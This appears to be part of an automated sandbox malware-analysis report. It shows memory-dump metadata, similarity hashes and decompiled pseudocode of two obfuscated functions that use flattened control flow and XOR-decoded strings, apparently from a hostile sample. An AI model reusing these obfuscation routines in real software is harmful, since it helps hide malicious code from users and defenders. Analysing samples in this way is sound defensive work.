                                                                                                                                                        0x012dff8e
                                                                                                                                                        0x012dff91
                                                                                                                                                        0x012dff65
                                                                                                                                                        0x012dff9a
                                                                                                                                                        0x012dffa0
                                                                                                                                                        0x012dffaa
                                                                                                                                                        0x012dffaf
                                                                                                                                                        0x012dffb8
                                                                                                                                                        0x012dffbd
                                                                                                                                                        0x012dffc0
                                                                                                                                                        0x012dffc6
                                                                                                                                                        0x012dffcd
                                                                                                                                                        0x012dffd7
                                                                                                                                                        0x012dffd9
                                                                                                                                                        0x012dffdf
                                                                                                                                                        0x012dffe2
                                                                                                                                                        0x012dffe2
                                                                                                                                                        0x012dffe7
                                                                                                                                                        0x012dffea
                                                                                                                                                        0x012dffed
                                                                                                                                                        0x012dfffd
                                                                                                                                                        0x012e0002
                                                                                                                                                        0x012e0005
                                                                                                                                                        0x012e0008
                                                                                                                                                        0x012dffe2
                                                                                                                                                        0x012e0011
                                                                                                                                                        0x012e0017
                                                                                                                                                        0x012e0021
                                                                                                                                                        0x012e0026
                                                                                                                                                        0x012e002f
                                                                                                                                                        0x012e0034
                                                                                                                                                        0x012e0037
                                                                                                                                                        0x012e003d
                                                                                                                                                        0x012e0044
                                                                                                                                                        0x012e004e
                                                                                                                                                        0x012e0050
                                                                                                                                                        0x012e0056
                                                                                                                                                        0x012e0059
                                                                                                                                                        0x012e0059
                                                                                                                                                        0x012e005e
                                                                                                                                                        0x012e0061
                                                                                                                                                        0x012e0064
                                                                                                                                                        0x012e007a
                                                                                                                                                        0x012e007f
                                                                                                                                                        0x012e0082
                                                                                                                                                        0x012e0085
                                                                                                                                                        0x012e0059
                                                                                                                                                        0x012e008e
                                                                                                                                                        0x012e0094
                                                                                                                                                        0x012e009e
                                                                                                                                                        0x012e00a3
                                                                                                                                                        0x012e00ac
                                                                                                                                                        0x012e00b1
                                                                                                                                                        0x012e00b4
                                                                                                                                                        0x012e00ba
                                                                                                                                                        0x012e00c1
                                                                                                                                                        0x012e00c8
                                                                                                                                                        0x012e00d2
                                                                                                                                                        0x012e00d4
                                                                                                                                                        0x012e00d7
                                                                                                                                                        0x012e00d7
                                                                                                                                                        0x012e00dc
                                                                                                                                                        0x012e00df
                                                                                                                                                        0x012e00e2
                                                                                                                                                        0x012e00f2
                                                                                                                                                        0x012e00f7
                                                                                                                                                        0x012e00fa
                                                                                                                                                        0x012e00d7
                                                                                                                                                        0x012e0103
                                                                                                                                                        0x012e0109
                                                                                                                                                        0x012e0113
                                                                                                                                                        0x012e0118
                                                                                                                                                        0x012e0121
                                                                                                                                                        0x012e0126
                                                                                                                                                        0x012e0129
                                                                                                                                                        0x012e012f
                                                                                                                                                        0x012e0136
                                                                                                                                                        0x012e0140
                                                                                                                                                        0x012e0142
                                                                                                                                                        0x012e0148
                                                                                                                                                        0x012e014b
                                                                                                                                                        0x012e014b
                                                                                                                                                        0x012e0150
                                                                                                                                                        0x012e0153
                                                                                                                                                        0x012e0156
                                                                                                                                                        0x012e016c
                                                                                                                                                        0x012e0171
                                                                                                                                                        0x012e0174
                                                                                                                                                        0x012e0177
                                                                                                                                                        0x012e014b
                                                                                                                                                        0x012e0180
                                                                                                                                                        0x012e0186
                                                                                                                                                        0x012e0190
                                                                                                                                                        0x012e0195
                                                                                                                                                        0x012e019e
                                                                                                                                                        0x012e01a3
                                                                                                                                                        0x012e01a6
                                                                                                                                                        0x012e01ac
                                                                                                                                                        0x012e01b3
                                                                                                                                                        0x012e01bd
                                                                                                                                                        0x012e01bf
                                                                                                                                                        0x012e01c5
                                                                                                                                                        0x012e01c8
                                                                                                                                                        0x012e01c8
                                                                                                                                                        0x012e01cd
                                                                                                                                                        0x012e01d0
                                                                                                                                                        0x012e01d3
                                                                                                                                                        0x012e01e9
                                                                                                                                                        0x012e01ee
                                                                                                                                                        0x012e01f1
                                                                                                                                                        0x012e01f4
                                                                                                                                                        0x012e01c8
                                                                                                                                                        0x012e01fd
                                                                                                                                                        0x012e020d

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: G#,$W|r'
                                                                                                                                                        • API String ID: 0-2204277761
                                                                                                                                                        • Opcode ID: 23b476004bff514bc6cc6f36c590ffbe31757ee572c13d320dd31a6f1e67bf39
                                                                                                                                                        • Instruction ID: e76fe6b948301f62a0a04d38f84353c4fb53d7f67facdacf779578f724df3888
                                                                                                                                                        • Opcode Fuzzy Hash: 23b476004bff514bc6cc6f36c590ffbe31757ee572c13d320dd31a6f1e67bf39
                                                                                                                                                        • Instruction Fuzzy Hash: 46D1F6F7A262808BE72A8F51E550B7DBEA0E355B44F00D22DD74B1B785CA78C2A5CF41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D8598, Relevance: 2.8, Strings: 2, Instructions: 259COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                        			E012D8598(signed long long __rax, long long __rcx, long long __rdx, long long __r9) {
				long long _v72;
				long long _v80;
				long long _v88;
				void* _v96;
				long long _v104;
				signed long long _v112;
				void* _v120;
				void* _v128;
				signed long long _v136;
				void* _v144;
				long long _v152;
				signed int _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				char _v196;
				void* _v200;
				signed long long _v208;
				long long _v216;
				intOrPtr _t107;
				intOrPtr _t127;
				signed int _t146;
				signed int _t161;
				signed long long _t179;
				signed long long _t184;
				signed long long _t186;
				long long _t187;
				signed long long _t188;
				intOrPtr* _t193;
				intOrPtr* _t195;
				long long _t199;
				signed long long _t201;
				void* _t202;
				signed long long _t211;

				_t187 = __rcx;
				_t179 = __rax;
				_t202 =  &_v184;
				_v152 = __r9;
				_v144 = __rdx;
				_t199 = __rcx;
				E012DCDB9(0x7d0, __rax);
				_v208 = _t179;
				_t101 = 0;
				_t193 =  &_v196;
				 *((char*)(_t193 - 4)) = 0;
				 *_t193 = 0x239d7f68;
				 *((intOrPtr*)(_t193 + 4)) = 0x73d97124;
				 *((intOrPtr*)(_t193 + 8)) = 0x239e7c62;
				 *((intOrPtr*)(_t193 + 0xc)) = 0x2dc13c33;
				 *((intOrPtr*)(_t193 + 0x10)) = 0x23ce3c3c;
				 *((intOrPtr*)(_t193 + 0x14)) = 0x31d97c26;
				 *((intOrPtr*)(_t193 + 0x18)) = 0x3d9342b;
				if( *((intOrPtr*)(_t193 - 4)) != 0) {
					L3:
					_t188 = _v208;
					r8d = 0x1b;
					E012DC96E(_t101, _t188, _t193);
					_t211 =  &_v200 | _t179;
					_v80 = _t199 + 0x872;
					_v88 = _t199 + 0x2bc;
					_v96 = _t199 + 0xbe4;
					_t124 =  ==  ? 0x585ee888 : 0x41cccdf;
					_v160 =  ==  ? 0x585ee888 : 0x41cccdf;
					_t126 =  !=  ? 0x585ee888 : 0x783f7eec;
					_v164 =  !=  ? 0x585ee888 : 0x783f7eec;
					_v104 = _t199 + 0xbd4;
					r12d = 0xff390ce8;
					r12d =  ==  ? 0xc0d874f8 : r12d;
					_v120 = _t199;
					_t184 = _t199 + 0xbc4;
					_v112 = _t184;
					r14d = 0xd5555b3b;
					r14d =  ==  ? 0x26c2480d : r14d;
					_t107 = 0xb67232be;
					while(1) {
						L4:
						_t127 = _t107;
						if(_t107 <= 0xff390ce7) {
							break;
						}
						if(_t127 <= 0x26c2480c) {
							L19:
							if(_t127 == 0xff390ce8) {
								r13d = 0x1b;
								_t107 = _v164;
								continue;
							}
							_t107 = _t127;
							if(_t127 != 0x41cccdf) {
								continue;
							}
							_v200 = sil;
							_v196 = 0x2c7fff4d;
							_v192 = 0x7576bf0e;
							_v188 = 0x702fe30b;
							_v184 = 0x7529b05d;
							_v180 = 0x7563f54a;
							_v176 = 0x702fe101;
							_v172 = 0x7529b05d;
							_v168 = 0x550f902e;
							if(_v200 != sil) {
								L24:
								_t188 = _v208 + 0x1b;
								_v216 = _v152;
								E012E020E(_t184, _t188, _t211, _v152, _v88);
								_t107 = 0xbee32c67;
								_t146 = 0x1b;
								continue;
							}
							do {
								 *(_t202 + 0x34 + _t184 * 4) = ( *(_t202 + 0x34 + _t184 * 4) & 0x1b0e6ca4 |  !( *(_t202 + 0x34 + _t184 * 4)) & 0xe4f1935b) ^ 0xb1fe0375;
								_t184 = _t184 + 1;
							} while (_t184 != 8);
							goto L24;
						}
						if(_t127 == 0x26c2480d) {
							_t107 = 0x585ee888;
							r13d = 0x1b;
							_t201 = _v112;
						} else {
							if(_t127 == 0x585ee888) {
								_v156 = r13d;
								_v72 = _t201;
								_v128 = _v80;
								_t184 = _v128;
								_t107 =  ==  ? 0xcde66983 : 0x82af19b1;
								_t186 = _v144;
							} else {
								_t107 = _t127;
								if(_t127 == 0x783f7eec) {
									_t184 = _v96;
									_v136 = _t184;
									r13d = 0x1b;
									_t201 = _v136;
									_t107 = _v160;
								}
							}
						}
					}
					if(_t127 > 0xc0d874f7) {
						if(_t127 == 0xc0d874f8) {
							_t107 = 0x585ee888;
							r13d = 0x1b;
							goto L4;
						}
						_t107 = r12d;
						if(_t127 == 0xd5555b3b) {
							goto L4;
						}
						_t107 = _t127;
						if(_t127 != 0xcde66983) {
							goto L4;
						}
						_t84 =  &_v196; // 0xff390d1c
						_t195 = _t84;
						 *((char*)(_t195 - 4)) = 0;
						 *_t195 = 0x72a4533d;
						 *((intOrPtr*)(_t195 + 4)) = 0x73e0073a;
						 *((intOrPtr*)(_t195 + 8)) = 0xb6026e;
						if( *((intOrPtr*)(_t195 - 4)) != 0) {
							L36:
							E012E020E(_t184, _t188 + _v208, _t195, _t186, _v72);
							r8d = 0;
							r9d = 0;
							E012D8282(_t184, _v120, _v208, _v72);
							return 1;
						} else {
							do {
								 *(_t202 + 0x30 + _t184 * 4) =  *(_t202 + 0x30 + _t184 * 4) & 0xff3ad8b1 |  !( *(_t202 + 0x30 + _t184 * 4)) & 0x00c5274e;
								_t188 = _t188 + 1;
								_t184 = _t184 + 1;
							} while (_t184 != 4);
							goto L36;
						}
						goto L19;
					}
					if(_t127 == 0x82af19b1) {
						E012DCDB9(0x3e8, _t184);
						_t186 = _t184;
						_v200 = sil;
						_v196 = 0x5de2cf27;
						_v192 = 0x3e79c71;
						_v188 = 0x70c2bc02;
						if(_v200 != sil) {
							L28:
							_t188 = _t186;
							E012E020E(_t184, _t188, _t211, _v128, _v144);
							_t107 = 0xcde66983;
							goto L4;
						}
						do {
							 *(_t202 + 0x30 + _t184 * 4) = ( *(_t202 + 0x30 + _t184 * 4) & 0xb1497711 |  !( *(_t202 + 0x30 + _t184 * 4)) & 0x4eb688ee) ^ 0x3e7434ec;
							_t188 = _t188 + 1;
							_t184 = _t184 + 1;
						} while (_t184 != 4);
						goto L28;
					}
					_t107 = r14d;
					if(_t127 != 0xb67232be) {
						_t107 = _t127;
						if(_t127 == 0xbee32c67) {
							_t146 = _t146 + 1;
							_t184 = _v208;
							_t107 =  ==  ? 0x585ee888 : 0xbee32c67;
							_t201 = _v136;
							r13d = _t146;
						}
					}
					goto L4;
				} else {
					_t101 = 1;
					do {
						_t161 =  *(_t202 + 0x30 + _t179 * 4);
						_t146 =  !_t161 & 0x0a576c7a;
						 *(_t202 + 0x30 + _t179 * 4) = (_t161 & 0xf5a89385 | _t146) ^ 0x09ae7e71;
						_t187 = _t187 + 1;
						_t179 = _t179 + 1;
					} while (_t179 != 8);
					goto L3;
				}
			}











































                                                                                                                                                        0x012d8598
                                                                                                                                                        0x012d8598
                                                                                                                                                        0x012d85a4
                                                                                                                                                        0x012d85ab
                                                                                                                                                        0x012d85b3
                                                                                                                                                        0x012d85b8
                                                                                                                                                        0x012d85c0
                                                                                                                                                        0x012d85c5
                                                                                                                                                        0x012d85ca
                                                                                                                                                        0x012d85cc
                                                                                                                                                        0x012d85d1
                                                                                                                                                        0x012d85d4
                                                                                                                                                        0x012d85da
                                                                                                                                                        0x012d85e1
                                                                                                                                                        0x012d85e8
                                                                                                                                                        0x012d85ef
                                                                                                                                                        0x012d85f6
                                                                                                                                                        0x012d85fd
                                                                                                                                                        0x012d8607
                                                                                                                                                        0x012d863c
                                                                                                                                                        0x012d863c
                                                                                                                                                        0x012d8641
                                                                                                                                                        0x012d8647
                                                                                                                                                        0x012d8656
                                                                                                                                                        0x012d8660
                                                                                                                                                        0x012d866f
                                                                                                                                                        0x012d867e
                                                                                                                                                        0x012d8696
                                                                                                                                                        0x012d8699
                                                                                                                                                        0x012d86a4
                                                                                                                                                        0x012d86a7
                                                                                                                                                        0x012d86b2
                                                                                                                                                        0x012d86c2
                                                                                                                                                        0x012d86c8
                                                                                                                                                        0x012d86cc
                                                                                                                                                        0x012d86d4
                                                                                                                                                        0x012d86db
                                                                                                                                                        0x012d86eb
                                                                                                                                                        0x012d86f1
                                                                                                                                                        0x012d86f5
                                                                                                                                                        0x012d86fc
                                                                                                                                                        0x012d86fc
                                                                                                                                                        0x012d86fc
                                                                                                                                                        0x012d8703
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d875a
                                                                                                                                                        0x012d87d1
                                                                                                                                                        0x012d87d7
                                                                                                                                                        0x012d897f
                                                                                                                                                        0x012d8987
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8987
                                                                                                                                                        0x012d87dd
                                                                                                                                                        0x012d87e5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d87eb
                                                                                                                                                        0x012d87f0
                                                                                                                                                        0x012d87f8
                                                                                                                                                        0x012d8800
                                                                                                                                                        0x012d880d
                                                                                                                                                        0x012d8811
                                                                                                                                                        0x012d8819
                                                                                                                                                        0x012d8821
                                                                                                                                                        0x012d8825
                                                                                                                                                        0x012d8832
                                                                                                                                                        0x012d885f
                                                                                                                                                        0x012d8864
                                                                                                                                                        0x012d886d
                                                                                                                                                        0x012d887d
                                                                                                                                                        0x012d8882
                                                                                                                                                        0x012d8887
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8887
                                                                                                                                                        0x012d8836
                                                                                                                                                        0x012d8852
                                                                                                                                                        0x012d8856
                                                                                                                                                        0x012d8859
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8836
                                                                                                                                                        0x012d8762
                                                                                                                                                        0x012d8916
                                                                                                                                                        0x012d891b
                                                                                                                                                        0x012d8921
                                                                                                                                                        0x012d8768
                                                                                                                                                        0x012d876e
                                                                                                                                                        0x012d892e
                                                                                                                                                        0x012d8933
                                                                                                                                                        0x012d8943
                                                                                                                                                        0x012d8948
                                                                                                                                                        0x012d895a
                                                                                                                                                        0x012d895d
                                                                                                                                                        0x012d8774
                                                                                                                                                        0x012d8774
                                                                                                                                                        0x012d877c
                                                                                                                                                        0x012d8782
                                                                                                                                                        0x012d878a
                                                                                                                                                        0x012d878f
                                                                                                                                                        0x012d8795
                                                                                                                                                        0x012d879a
                                                                                                                                                        0x012d879a
                                                                                                                                                        0x012d877c
                                                                                                                                                        0x012d876e
                                                                                                                                                        0x012d8762
                                                                                                                                                        0x012d870b
                                                                                                                                                        0x012d87a9
                                                                                                                                                        0x012d8967
                                                                                                                                                        0x012d896c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8972
                                                                                                                                                        0x012d87af
                                                                                                                                                        0x012d87b8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d87be
                                                                                                                                                        0x012d87c6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8992
                                                                                                                                                        0x012d8992
                                                                                                                                                        0x012d8997
                                                                                                                                                        0x012d899a
                                                                                                                                                        0x012d89a0
                                                                                                                                                        0x012d89a7
                                                                                                                                                        0x012d89b1
                                                                                                                                                        0x012d89e0
                                                                                                                                                        0x012d89f4
                                                                                                                                                        0x012d8a06
                                                                                                                                                        0x012d8a09
                                                                                                                                                        0x012d8a0c
                                                                                                                                                        0x012d8a26
                                                                                                                                                        0x012d89b3
                                                                                                                                                        0x012d89ba
                                                                                                                                                        0x012d89d0
                                                                                                                                                        0x012d89d4
                                                                                                                                                        0x012d89d7
                                                                                                                                                        0x012d89da
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d89ba
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d89b1
                                                                                                                                                        0x012d8717
                                                                                                                                                        0x012d8896
                                                                                                                                                        0x012d889b
                                                                                                                                                        0x012d889e
                                                                                                                                                        0x012d88a3
                                                                                                                                                        0x012d88ab
                                                                                                                                                        0x012d88b3
                                                                                                                                                        0x012d88c0
                                                                                                                                                        0x012d88f5
                                                                                                                                                        0x012d88fa
                                                                                                                                                        0x012d8905
                                                                                                                                                        0x012d890a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d890f
                                                                                                                                                        0x012d88c9
                                                                                                                                                        0x012d88e5
                                                                                                                                                        0x012d88e9
                                                                                                                                                        0x012d88ec
                                                                                                                                                        0x012d88ef
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d88c9
                                                                                                                                                        0x012d871d
                                                                                                                                                        0x012d8726
                                                                                                                                                        0x012d8728
                                                                                                                                                        0x012d8730
                                                                                                                                                        0x012d8732
                                                                                                                                                        0x012d8734
                                                                                                                                                        0x012d8747
                                                                                                                                                        0x012d874a
                                                                                                                                                        0x012d874f
                                                                                                                                                        0x012d874f
                                                                                                                                                        0x012d8730
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8609
                                                                                                                                                        0x012d8609
                                                                                                                                                        0x012d8610
                                                                                                                                                        0x012d8610
                                                                                                                                                        0x012d8618
                                                                                                                                                        0x012d862c
                                                                                                                                                        0x012d8630
                                                                                                                                                        0x012d8633
                                                                                                                                                        0x012d8636
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8610

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ~?x$~?x
                                                                                                                                                        • API String ID: 0-2336588496
                                                                                                                                                        • Opcode ID: 4047b8d6b2b0e9089c40285a43469e71acfc747940548cc493eadf4865c271e0
                                                                                                                                                        • Instruction ID: 1151603aac8c56900e5c4164d977993ff1fdec1a24725853a2bdd5e83a2cbe23
                                                                                                                                                        • Opcode Fuzzy Hash: 4047b8d6b2b0e9089c40285a43469e71acfc747940548cc493eadf4865c271e0
                                                                                                                                                        • Instruction Fuzzy Hash: 89A1F5B7628B848AD7658F19F48436EBBA0F384794F54411AEFCA97B18DB78C841CF44
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D6118, Relevance: 2.7, Strings: 2, Instructions: 237COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                        			E012D6118(void* __ecx, intOrPtr __edx, void* __edi, long long __rcx, long long __r8, long long __r9) {
				long long _v72;
				long long _v80;
				long long _v88;
				void* _v96;
				void* _v104;
				intOrPtr _v112;
				intOrPtr _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				signed int _v132;
				char _v136;
				intOrPtr _v140;
				signed long long _v152;
				intOrPtr _v156;
				signed long long _v160;
				signed int _v164;
				intOrPtr _v168;
				unsigned int _v172;
				signed int _v173;
				signed int _v174;
				signed int _v192;
				signed int _v200;
				void* _t77;
				signed int _t87;
				signed int _t105;
				signed int _t129;
				signed int _t139;
				signed int _t143;
				void* _t149;
				signed int _t150;
				intOrPtr _t153;
				signed int _t154;
				signed long long _t165;
				void* _t169;
				signed long long _t178;
				void* _t179;
				long long _t180;
				void* _t181;
				void* _t184;

				_t183 = __r9;
				_t182 = __r8;
				_t149 = __edi;
				_t181 =  &_v168;
				_v80 = __r9;
				_v88 = __r8;
				_v140 = __edx;
				_v96 = __rcx;
				_t105 =  *((intOrPtr*)(__rcx));
				r12d = 0;
				_t77 = 0x34e780b;
				L1:
				while(_t77 <= 0x34e780a) {
					if(_t77 <= 0xda62c56b) {
						if(_t77 == 0x9fdeaf83) {
							_v164 = _t154;
							_t77 =  <  ? 0x5e7c3703 : 0xc1bec495;
						} else {
							if(_t77 == 0xc1bec495) {
								_t165 = _v160;
								 *((char*)(_v152 + _t165)) = 0;
								_v172 = E012E26AC(_t105, _t149, _t153, _t154, _v152);
								_t83 =  !=  ? 0xefa1ed94 : 0x125884f2;
								_t77 =  ==  ? 0x125884f2 :  !=  ? 0xefa1ed94 : 0x125884f2;
								r14b = _v173;
							}
						}
						continue;
					}
					if(_t77 == 0xda62c56c) {
						_t77 = 0x6d3089cf;
						_t149 = 0;
						continue;
					}
					if(_t77 == 0xefa1ed94) {
						_v72 = _t180;
						r14d = _t149;
						_t179 = _t184;
						r12d = _t105;
						_t87 = _v172 >> 0x00000018 & 0x00000001 | (_v172 >> 0x00000018 ^ 0xffffffff) & 0x000000fe;
						_t129 = ((_v172 >> 0x00000010 ^ 0x0000ff00) & _v172 >> 0x00000010 & 0x0000f16e | ((_v172 >> 0x00000010 ^ 0x0000ff00) & _v172 >> 0x00000010 ^ 0xffffffff) & 0xf0490e91) ^ 0xf0490e6f;
						_t139 = _v172 >> 8;
						r9d = _t139;
						r9d = r9d ^ 0x00ffff00;
						r9d = r9d & _t139;
						r9d = r9d & 0x00ffff01;
						r9d = r9d | (r9d ^ 0xffffffff) & 0x000000fe;
						_t143 = _v172;
						r8d = _t143;
						r8d = r8d ^ 0xffffff00;
						r8d = r8d & _t143;
						r8d = r8d & 0xffffff01;
						r8d = r8d | (r8d ^ 0xffffffff) & 0x000000fe;
						_v136 = 0;
						_t154 = 0x1f115627;
						_v132 = 0x1f115627;
						_v128 = 0x1f50562c;
						_v124 = 0x1f5b5666;
						_v120 = 0x1f115627;
						_v116 = 0x1f50562c;
						_v112 = 0x1f755666;
						if(_v136 != 0) {
							L25:
							_v192 = _t87;
							_v200 = _t129;
							_t178 =  &_v132;
							E012E0258(_t165, _v80, _t178, _t182, _t183);
							_t77 = 0x125884f2;
							_t105 = r12d;
							_t184 = _t179;
							_t149 = r14d;
							r14b = 1;
							_t180 = _v72;
							continue;
						}
						do {
							_t150 =  *(_t181 + 0x60 + _t178 * 4);
							_t154 =  !_t150 & 0x1f755602;
							 *(_t181 + 0x60 + _t178 * 4) = _t150 & 0xe08aa9fd | _t154;
							_t169 = _t169 + 1;
							_t178 = _t178 + 1;
						} while (_t178 != 7);
						goto L25;
					}
					if(_t77 == 0xf8820898) {
						_t77 = 0x6d3089cf;
						_t149 = 3;
					}
				}
				if(_t77 > 0x5ec7329c) {
					if(_t77 == 0x6d3089cf) {
						_t77 =  ==  ? 0x34e780b : 0x5ec7329d;
						r15d = _v156;
						_t105 = _v156;
						r12b = _v174;
						r13b = _v174;
						goto L1;
					}
					if(_t77 == 0x7028e374) {
						E012DCDB9(0x104, _t165);
						_v152 = _t165;
						_v104 = _v88 + _t165 * 8;
						_t165 = _v104;
						_t153 = _t105;
						_t169 =  *_t165;
						_t154 = 0;
						r8d = 0x6efba69c;
						r9d = 0x85;
						E012DFAD7(1, _t153, _t165, _v88);
						_t105 = _t153;
						_v160 =  *_t165();
						_t77 = 0x9fdeaf83;
						goto L1;
					}
					if(_t77 != 0x5ec7329d) {
						goto L1;
					}
					 *_v96 = r15d;
					return (r13d ^ 0x000000fe) & 0xffffff00 | ((r13d ^ 0x000000fe) & r13b) != 0x00000000;
				} else {
					if(_t77 == 0x34e780b) {
						_v173 = r12b;
						_v168 = _t105;
						_t77 =  <  ? 0x7028e374 : 0x5ec7329d;
						r15d = _v168;
						r13b = _v173;
					} else {
						if(_t77 == 0x125884f2) {
							_v174 = r14b;
							_v156 = _v168 + 1;
							E012DCC2E(_t165, _v152);
							_t77 =  ==  ? 0xda62c56c : 0xf8820898;
						} else {
							if(_t77 == 0x5e7c3703) {
								_t165 =  *_v104;
								_t178 = _v152;
								 *((char*)(_t178 + _v164)) =  *((intOrPtr*)(_t165 + _v164 * 2));
								_t154 = _v164 + 1;
								_t77 = 0x9fdeaf83;
							}
						}
					}
					goto L1;
				}
			}











































                                                                                                                                                        0x012d6118
                                                                                                                                                        0x012d6118
                                                                                                                                                        0x012d6118
                                                                                                                                                        0x012d6124
                                                                                                                                                        0x012d612b
                                                                                                                                                        0x012d6133
                                                                                                                                                        0x012d613b
                                                                                                                                                        0x012d613f
                                                                                                                                                        0x012d6147
                                                                                                                                                        0x012d6149
                                                                                                                                                        0x012d614c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6151
                                                                                                                                                        0x012d61a9
                                                                                                                                                        0x012d6202
                                                                                                                                                        0x012d648c
                                                                                                                                                        0x012d64a4
                                                                                                                                                        0x012d6208
                                                                                                                                                        0x012d620d
                                                                                                                                                        0x012d6213
                                                                                                                                                        0x012d621d
                                                                                                                                                        0x012d622b
                                                                                                                                                        0x012d6244
                                                                                                                                                        0x012d624e
                                                                                                                                                        0x012d6251
                                                                                                                                                        0x012d6251
                                                                                                                                                        0x012d620d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6202
                                                                                                                                                        0x012d61b0
                                                                                                                                                        0x012d62be
                                                                                                                                                        0x012d62c3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d62c3
                                                                                                                                                        0x012d61bb
                                                                                                                                                        0x012d62ca
                                                                                                                                                        0x012d62d2
                                                                                                                                                        0x012d62d5
                                                                                                                                                        0x012d62d8
                                                                                                                                                        0x012d62f5
                                                                                                                                                        0x012d631a
                                                                                                                                                        0x012d6324
                                                                                                                                                        0x012d6327
                                                                                                                                                        0x012d632a
                                                                                                                                                        0x012d6331
                                                                                                                                                        0x012d633b
                                                                                                                                                        0x012d6342
                                                                                                                                                        0x012d6345
                                                                                                                                                        0x012d6349
                                                                                                                                                        0x012d634c
                                                                                                                                                        0x012d6353
                                                                                                                                                        0x012d635d
                                                                                                                                                        0x012d6364
                                                                                                                                                        0x012d6369
                                                                                                                                                        0x012d636d
                                                                                                                                                        0x012d6372
                                                                                                                                                        0x012d637b
                                                                                                                                                        0x012d637f
                                                                                                                                                        0x012d6387
                                                                                                                                                        0x012d638b
                                                                                                                                                        0x012d638f
                                                                                                                                                        0x012d639b
                                                                                                                                                        0x012d63ca
                                                                                                                                                        0x012d63ca
                                                                                                                                                        0x012d63ce
                                                                                                                                                        0x012d63da
                                                                                                                                                        0x012d63df
                                                                                                                                                        0x012d63e4
                                                                                                                                                        0x012d63e9
                                                                                                                                                        0x012d63ec
                                                                                                                                                        0x012d63ef
                                                                                                                                                        0x012d63f2
                                                                                                                                                        0x012d63f5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d63f5
                                                                                                                                                        0x012d63a4
                                                                                                                                                        0x012d63a4
                                                                                                                                                        0x012d63ac
                                                                                                                                                        0x012d63ba
                                                                                                                                                        0x012d63be
                                                                                                                                                        0x012d63c1
                                                                                                                                                        0x012d63c4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d63a4
                                                                                                                                                        0x012d61c6
                                                                                                                                                        0x012d61c8
                                                                                                                                                        0x012d61cd
                                                                                                                                                        0x012d61cd
                                                                                                                                                        0x012d61c6
                                                                                                                                                        0x012d615d
                                                                                                                                                        0x012d61dc
                                                                                                                                                        0x012d640e
                                                                                                                                                        0x012d6411
                                                                                                                                                        0x012d6416
                                                                                                                                                        0x012d641a
                                                                                                                                                        0x012d641f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d641f
                                                                                                                                                        0x012d61e7
                                                                                                                                                        0x012d642e
                                                                                                                                                        0x012d6433
                                                                                                                                                        0x012d6448
                                                                                                                                                        0x012d6450
                                                                                                                                                        0x012d6458
                                                                                                                                                        0x012d645a
                                                                                                                                                        0x012d645d
                                                                                                                                                        0x012d6466
                                                                                                                                                        0x012d646c
                                                                                                                                                        0x012d6472
                                                                                                                                                        0x012d647a
                                                                                                                                                        0x012d647e
                                                                                                                                                        0x012d6482
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6482
                                                                                                                                                        0x012d61f2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d64b4
                                                                                                                                                        0x012d64d5
                                                                                                                                                        0x012d615f
                                                                                                                                                        0x012d6164
                                                                                                                                                        0x012d625b
                                                                                                                                                        0x012d6260
                                                                                                                                                        0x012d6276
                                                                                                                                                        0x012d6279
                                                                                                                                                        0x012d627e
                                                                                                                                                        0x012d616a
                                                                                                                                                        0x012d616f
                                                                                                                                                        0x012d6288
                                                                                                                                                        0x012d6293
                                                                                                                                                        0x012d629c
                                                                                                                                                        0x012d62b6
                                                                                                                                                        0x012d6175
                                                                                                                                                        0x012d617a
